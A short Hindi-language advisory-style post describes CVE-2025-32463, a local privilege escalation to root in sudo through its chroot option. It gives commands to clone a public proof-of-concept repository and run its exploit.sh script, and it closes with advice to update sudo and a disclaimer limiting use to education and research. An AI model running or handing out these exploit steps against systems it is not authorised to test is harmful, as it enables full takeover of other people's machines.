
Linux में Sudo chroot के माध्यम से रूट तक स्थानीय विशेषाधिकार वृद्धि
लिनक्स में Sudo chroot के माध्यम से रूट तक स्थानीय विशेषाधिकार वृद्धि
CVE-2025-32463 Sudo बाइनरी में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है। यह दोष एक स्थानीय उपयोगकर्ता को विशिष्ट गलत कॉन्फ़िगरेशन या क्राफ्टेड इनपुट के तहत विशेषाधिकारों को रूट तक बढ़ाने की अनुमति देता है। यह समस्या Rich Mirch द्वारा खोजी गई थी।
कम विशेषाधिकारों वाला हमलावर इस भेद्यता का फायदा उठाकर रूट एक्सेस प्राप्त कर सकता है, जिससे सिस्टम पूरी तरह से समझौता हो जाता है।
git clone https://github.com/kh4sh3i/CVE-2025-32463.git
cd CVE-2025-32463
chmod +x exploit.sh
id
./exploit.sh
id
sudo को नवीनतम पैच किए गए संस्करण में अपडेट करें।यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। बिना अनुमति के किसी भी सिस्टम पर इसे चलाना अवैध और अनैतिक है।